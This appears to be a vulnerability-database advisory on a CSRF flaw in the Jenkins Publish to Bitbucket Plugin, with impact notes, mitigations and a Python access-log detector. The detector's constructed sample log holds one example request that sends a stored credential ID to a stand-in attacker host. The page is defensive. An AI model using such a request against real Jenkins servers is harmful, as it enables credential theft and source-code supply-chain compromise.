CVE-2025-64149: Vulnerability in Jenkins Project Jenkins Publish to Bitbucket Plugin
A cross-site request forgery (CSRF) vulnerability in Jenkins Publish to Bitbucket Plugin 0.4 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
AI Analysis
Technical Summary
CVE-2025-64149 is a cross-site request forgery (CSRF) vulnerability in the Jenkins Publish to Bitbucket Plugin, version 0.4 and earlier. The description uses the Jenkins project's standard wording for an HTTP endpoint that does not require POST requests. Jenkins' built-in CSRF protection (the crumb) is only enforced on POST, so an endpoint that also accepts GET, typically a connection-test style form-validation method, can be triggered cross-site by an image tag or link on an attacker-controlled page that a logged-in Jenkins user visits. The request names a URL and a credentials ID; Jenkins then connects to that URL and authenticates with the selected stored credential, so an attacker who supplied their own server as the URL captures it. Credentials IDs are not secret, which is why the description says they are "obtained through another method": they appear in job configuration, Jenkinsfiles and credential drop-downs visible to anyone with read access, and they are often guessable. The page does not name the affected endpoint. In practice the attack is phishing-driven: the attacker needs no Jenkins account of their own, but must get a victim who is logged in and permitted to use the endpoint to load attacker-controlled content, so user interaction is inherent to the bug. The page's CVSS score of 5.4 (medium) is quoted with a vector of network attack vector, low privileges and no user interaction (UI:N), which does not fit a CSRF, and the record below lists no CVSS version; check the Jenkins advisory or NVD for the authoritative vector. The impact is confidentiality of the stored credential and, through it, integrity of whatever that credential can write to; availability is not affected. No fix is linked on this page and no exploitation in the wild has been reported. The weakness is CWE-352 (Cross-Site Request Forgery). Because Jenkins sits at the centre of CI/CD, a captured Bitbucket credential can give an attacker read or write access to source repositories, which makes this a software supply chain concern rather than only a credential leak.
Potential Impact
For European organizations the direct loss is the Bitbucket credential stored in Jenkins, whether an account password, app password or access token, together with everything that credential can reach: cloning private repositories, pushing commits and, depending on the credential's permissions, administering repositories or pipelines. That turns a medium-severity CSRF into a supply chain risk: an attacker who can push to a repository that Jenkins builds and deploys can insert malicious code that is then tested, packaged and shipped by the organization's own pipeline. Organizations that pair Jenkins with Bitbucket (Cloud or Data Center) and grant many developers configure rights on jobs are the most exposed, because each such user is a viable CSRF victim. The attack needs a victim to be lured rather than a port scanner, so it is more likely to surface as targeted phishing of DevOps staff than as mass automated exploitation. Sectors with strict change-control and data-protection obligations, such as finance, healthcare and critical infrastructure, face regulatory consequences on top of the technical ones if source code or credentials leak.
Mitigation Recommendations
1. Treat the plugin as unfixed: this page links no patched release. Uninstall it where it is not essential, and check the Jenkins security advisory for the CVE before reinstalling.
2. Where it must stay, shrink both the pool of potential victims and the set of capturable credentials: grant Configure on jobs that use the plugin only to people who need it, scope Bitbucket credentials to the folder or job that needs them instead of the global store, and use app passwords or tokens with minimal repository permissions rather than account passwords.
3. Restrict outbound connections from the Jenkins controller (and any agent that runs this step) to the known Bitbucket hosts. The attack works by making Jenkins authenticate to an attacker-chosen URL, so egress filtering blocks the capture even when the CSRF itself succeeds.
4. Enable Jenkins access logging and look for requests to the plugin's validation endpoints that use GET, carry a credentials ID, name a URL outside your Bitbucket hosts, or arrive with a Referer from outside the Jenkins UI; correlate with egress logs showing the controller connecting to unexpected hosts.
5. If exploitation is suspected, rotate the affected Bitbucket credentials and review Bitbucket audit logs for clones or pushes from unexpected sources.
6. A reverse proxy or WAF in front of Jenkins can reject cross-site GET requests to the vulnerable endpoint, but the rule needs the exact path, which this page does not give, and some Jenkins form validation legitimately uses GET, so test the rule against the UI before enforcing it. It is a stopgap, not a substitute for removing the plugin.
7. Keep Jenkins core and plugins current and subscribe to the Jenkins security advisory list so a fixed release, once published, is picked up promptly.
8. Make developers and DevOps staff aware that a logged-in Jenkins session plus one malicious link is all this attack needs; logging out when done and using a separate browser profile for administrative tools reduce exposure.
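As an added example (not code from this page, from the analysis above, or from the Jenkins project), the detector below applies the access-log checks from item 4 to a few constructed Jenkins access-log lines in Winstone's combined format. The Jenkins hostname, the allowed Bitbucket hosts, the descriptor name org.example.PublishToBitbucket, the method name testConnection and the URL query-parameter names are assumptions for illustration; the real endpoint path is not given on this page, so substitute the one from the plugin's source.

```python
"""Flag likely CSRF-driven credential-capture attempts against a Jenkins
form-validation endpoint, using NCSA "combined" access-log lines.

Added example; hostnames, endpoint names and log lines are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

JENKINS_HOST = "jenkins.corp.example"                                # assumed
TRUSTED_TARGET_HOSTS = {"bitbucket.org", "bitbucket.corp.example"}   # assumed
# Parameter names a connection-test endpoint might use for the target; assumed.
URL_PARAMS = ("url", "serverUrl", "bitbucketUrl", "baseUrl")

# NCSA combined: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Jenkins exposes descriptor form-validation methods as
# /descriptorByName/<DescriptorClass>/<doMethodName>; doCheck*/doTest*/doValidate*
# are the conventional prefixes. (doFill* drop-down helpers are excluded on purpose.)
VALIDATION_PATH_RE = re.compile(r"/descriptorByName/[^/]+/(check|test|validate)[A-Za-z]*$")

# Constructed sample: one benign validation from the Jenkins UI, one cross-site
# GET pointing the credential at an attacker host, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - alice [29/Oct/2025:13:45:43 +0000] "POST /descriptorByName/org.example.PublishToBitbucket/testConnection?url=https%3A%2F%2Fbitbucket.corp.example&credentialsId=bb-deploy HTTP/1.1" 200 17 "https://jenkins.corp.example/job/app/configure" "Mozilla/5.0"',
    '10.0.0.9 - bob [29/Oct/2025:13:46:01 +0000] "GET /descriptorByName/org.example.PublishToBitbucket/testConnection?url=https%3A%2F%2Fcollector.attacker.example%2F&credentialsId=bb-deploy HTTP/1.1" 200 17 "https://blog.attacker.example/post" "Mozilla/5.0"',
    '10.0.0.7 - carol [29/Oct/2025:13:46:10 +0000] "GET /job/app/lastBuild/console HTTP/1.1" 200 5120 "https://jenkins.corp.example/job/app/" "Mozilla/5.0"',
]


@dataclass
class Finding:
    line_no: int
    user: str
    ip: str
    reasons: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines) -> List[Finding]:
    """Return one Finding per validation request that looks like credential capture."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not VALIDATION_PATH_RE.search(parts.path):
            continue
        query = parse_qs(parts.query)
        if "credentialsId" not in query:
            continue  # no stored credential selected, nothing to capture
        cred_id = query["credentialsId"][0]
        reasons = []
        # Jenkins only enforces its CSRF crumb on POST, so a GET here is reachable cross-site.
        if rec["method"] != "POST":
            reasons.append(f"{rec['method']} request to validation endpoint (crumb not enforced)")
        # Legitimate validation is issued by the Jenkins UI, so the Referer should be Jenkins itself.
        ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] not in ("", "-") else None
        if ref_host != JENKINS_HOST:
            reasons.append(f"referer host {ref_host!r} is not the Jenkins UI")
        # The credential is sent to whatever host the request names; anything off the allow-list is capture.
        for param in URL_PARAMS:
            for target_url in query.get(param, []):
                host = urlsplit(target_url).hostname
                if host not in TRUSTED_TARGET_HOSTS:
                    reasons.append(f"credential {cred_id!r} would be sent to untrusted host {host!r}")
        if reasons:
            findings.append(Finding(n, rec["user"], rec["ip"], reasons))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line_no}: user={f.user} ip={f.ip}")
        for r in f.reasons:
            print("  -", r)
```

Jenkins writes an access log of this shape when started with, for example, --accessLoggerClassName=winstone.accesslog.SimpleAccessLogger --simpleAccessLogger.format=combined --simpleAccessLogger.file=/var/log/jenkins/access.log. A missing Referer is treated as untrusted here, which gives false positives for users behind a strict referrer policy, so weight the method and target-host reasons above the referer reason rather than alerting on any one of them alone.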
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden
Technical Details
Data Version: 5.1
Assigner Short Name: jenkins
Date Reserved: 2025-10-28T07:34:37.543Z
Cvss Version: null
State: PUBLISHED
Threat ID: 69021a8714cc779bff051085
Added to database: 10/29/2025, 1:45:43 PM
Last enriched: 11/5/2025, 3:56:30 PM
Last updated: 12/13/2025, 11:26:35 AM
Views: 90